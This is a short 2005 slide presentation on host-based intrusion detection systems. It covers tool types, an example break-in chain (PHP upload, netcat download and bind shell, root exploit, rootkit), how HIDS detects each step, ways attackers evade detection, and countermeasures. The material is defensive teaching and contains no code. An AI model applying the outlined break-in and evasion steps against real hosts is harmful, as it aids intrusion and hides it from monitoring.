Host-based Intrusion Detection Systems (HIDS) Pieter de Boer - - PowerPoint PPT Presentation

host based intrusion detection systems hids
SMART_READER_LITE
LIVE PREVIEW

Host-based Intrusion Detection Systems (HIDS) Pieter de Boer - - PowerPoint PPT Presentation

Oct 08, 2022 224 likes •314 views

Host-based Intrusion Detection Systems (HIDS) Pieter de Boer Martin Pels 09/02/2005 Contents HIDS-types Example break-in Protection using HIDS Evasion possibilities Evasion prevention Conclusion 09/02/2005 Host-based

slide-1
SLIDE 1

Host-based Intrusion Detection Systems (HIDS)

Pieter de Boer Martin Pels 09/02/2005

slide-2
SLIDE 2

Contents

09/02/2005 Host-based Intrusion Detection Systems 2/8

  • HIDS-types
  • Example break-in
  • Protection using HIDS
  • Evasion possibilities
  • Evasion prevention
  • Conclusion
slide-3
SLIDE 3

HIDS-types

  • Filesystem monitoring

➔ AIDE, Mtree

  • Logfile analysis

➔ Swatch, Sec

  • Connection analysis

➔ Scanlogd, PortSentry

  • Kernel-based IDS (process monitoring etc.)

➔ IDSpbr, LIDS

Contents

  • Types
  • Break-in
  • Protection
  • Evasion
  • Prevention
  • Conclusion

09/02/2005 Host-based Intrusion Detection Systems 3/8

slide-4
SLIDE 4

Example break-in

1) Bug in forum: uploading & executing PHP-code 2) Downloading netcat through PHP-file 3) Binding netcat to a port --> Shell 4) Executing root-exploit in the shell 5) Install rootkit, etc.

09/02/2005 Host-based Intrusion Detection Systems 4/8

Contents

  • Types
  • Break-in
  • Protection
  • Evasion
  • Prevention
  • Conclusion
slide-5
SLIDE 5

Protection using HIDS

  • Logfile analysis

➔ Detection of PHP-file upload and netcat execution

  • File monitoring

➔ Detection files (PHP-file & netcat binary) and

installed rootkit

  • Connection Analysis

➔ Detection of unauthorized daemons

  • Kernel-based IDS

➔ Detection of root-exploit execution

09/02/2005 Host-based Intrusion Detection Systems 5/8

Contents

  • Types
  • Break-in
  • Protection
  • Evasion
  • Prevention
  • Conclusion
slide-6
SLIDE 6

Evasion possibilities

  • Logfile analysis

➔ Encoding of requests

  • File monitoring

➔ Deletion of files after use, modify file monitor

  • Connection Analysis

➔ Set up netcat connection to the outside

  • Kernel-based IDS

➔ Use of undetectable exploits

09/02/2005 Host-based Intrusion Detection Systems 6/8

Contents

  • Types
  • Break-in
  • Protection
  • Evasion
  • Prevention
  • Conclusion
slide-7
SLIDE 7

Evasion prevention

  • Logfile analysis

➔ Anomaly detection

  • File monitoring

➔ Realtime monitoring,

Placing monitor on read-only media

  • Connection Analysis

➔ Detection of connections to the outside

  • Kernel-based IDS

➔ Anomaly detection

09/02/2005 Host-based Intrusion Detection Systems 7/8

Contents

  • Types
  • Break-in
  • Protection
  • Evasion
  • Prevention
  • Conclusion
slide-8
SLIDE 8

Conclusion

  • HIDSs are not perfect
  • Despite this they can certainly be useful

09/02/2005 Host-based Intrusion Detection Systems 8/8

Contents

  • Types
  • Break-in
  • Protection
  • Evasion
  • Prevention
  • Conclusion